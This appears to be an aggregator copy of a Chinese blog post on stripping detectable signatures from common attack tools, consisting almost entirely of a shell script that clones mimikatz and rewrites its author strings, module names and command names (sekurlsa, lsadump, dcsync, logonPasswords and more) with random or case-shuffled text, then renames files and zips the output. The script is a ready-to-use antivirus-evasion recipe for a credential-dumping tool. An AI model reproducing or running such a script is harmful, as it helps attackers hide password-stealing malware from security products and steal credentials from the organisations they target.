7
常见工具特征去除
source link: https://www.ascotbe.com/2021/07/09/FrequentToolCharacteristics/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
mimikatz改造
替换关键字脚本
#!/bin/sh
git clone --depth=1 https://github.com.cnpmjs.org/gentilkiwi/mimikatz.git mimikatz
## BASIC Strings ##
mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
mv windows/mimikatz windows/$mimi
find windows/ -type f -print0 | xargs -0 sed -i "s/mimikatz/$mimi/g"
MIMI=$(cat /dev/urandom | tr -dc "A-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/MIMIKATZ/$MIMI/g"
Mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Mimikatz/$Mimi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 23 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/[email protected]/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/creativecommons/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 10 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/gentilkiwi/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/KIWI/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Kiwi/$string/g"
kiwi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/kiwi/$kiwi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 13 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/A La Vie, A L/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 24 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/[email protected]/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/oe.eo/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/pingcastle.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 16 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/mysmartlogon.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Vincent LE TOUX/$string/g"
## Basic Function Names ##
find windows/ -type f -print0 | xargs -0 sed -i "s/logonPasswords/loGoNpASSwoRdS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dpapi/dPApi/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurlsa/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurLSA/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ngc/nGc/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/lsadump/lsADumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/crypto/cRyPTO/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/kerberos/kErberoS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/token/tOKEn/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/misc/mIsC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minesweeper/mInesWeEpEr/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/vault/vAULt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/privilege/PRIViLeGe/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/process/ProCeSs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/busylight/bUsYlIght/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sr98/sR98/g"
## Sub-function Names ##
# Sekurlsa #
find windows/ -type f -print0 | xargs -0 sed -i "s/msv/mSv/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/wdigest/wDiGeST/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tspkg/tsPkG/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/livessp/liVeSsP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudap/clOuDAp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ssp/sSp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/logonpasswords/loGonPaSSworDs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minidump/mIniDumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/bootkey/bOOtKey/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/pth/ptH/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/krbtgt/krbTgT/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/backupkeys/backUpKeyS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tickets/ticKets/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ekeys/eKeYs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credman/crEdMan/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tickets/ticKets/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ekeys/eKeYs/g"
# Crypto #
find windows/ -type f -print0 | xargs -0 sed -i "s/providers/prOviDers/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/certificates/certIfiCatEs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/scauth/sCaUth/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/extract/exTraCt/g"
# dpapi #
find windows/ -type f -print0 | xargs -0 sed -i "s/masterkey/masTerKeY/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credhist/crEdHiSt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapkd/clOudApKd/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapreg/clOuDapReg/g"
# kerberos #
find windows/ -type f -print0 | xargs -0 sed -i "s/golden/golDen/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ptt/pTt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/clist/cLiSt/g"
# lsadump #
find windows/ -type f -print0 | xargs -0 sed -i "s/secrets/seCrEts/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sam/saM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcshadow/dCShAdoW/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcsync/dCsYnC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/setntlm/seTnTlM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/netsync/neTSynC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cache/caCHe/g"
# misc #
find windows/ -type f -print0 | xargs -0 sed -i "s/regedit/reGeDit/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/skeleton/sKeLeToN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/easyntlmchall/easYnTlmChaLl/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ncroutemon/nCroUTeMoN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/taskmgr/taSkMgR/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/aadcookie/aAdcOoKiE/g"
# vault #
find windows/ -type f -print0 | xargs -0 sed -i "s/cred/crEd/g"
# token #
find windows/ -type f -print0 | xargs -0 sed -i "s/elevate/eleVatE/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/revert/reVeRt/g"
## Replace file names ##
find windows/ -type f -name "*mimikatz*" | while read FILE ; do
newfile="$(echo ${FILE} |sed -e "s/mimikatz/$mimi/g")";
mv "${FILE}" "${newfile}";
done
find windows/ -type f -name "*kiwi*" | while read FILE ; do
newfile="$(echo ${FILE} |sed -e "s/kiwi/$kiwi/g")";
mv "${FILE}" "${newfile}";
done
## ZIP File ##
zip -r mimi.zip ./windows
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK